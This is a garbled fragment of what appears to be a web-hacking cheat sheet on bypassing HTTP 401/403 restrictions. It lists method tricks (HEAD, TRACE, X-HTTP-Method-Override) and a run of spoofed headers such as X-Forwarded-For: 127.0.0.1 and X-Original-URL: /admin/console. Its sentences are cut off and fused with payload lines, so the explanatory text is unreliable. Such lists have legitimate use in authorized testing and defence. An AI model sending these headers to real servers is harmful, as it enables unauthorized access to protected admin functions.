GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK
Content-Length: 55
means that the HEAD verb can access the info. But you still need to find a way to exfiltrate that info.X-HTTP-Method-Override: PUT
can overwrite the verb used.TRACE
verb and if you are very lucky maybe in the response you can see also the headers added by intermediate proxies that might be useful.X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
Host: localhost
X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console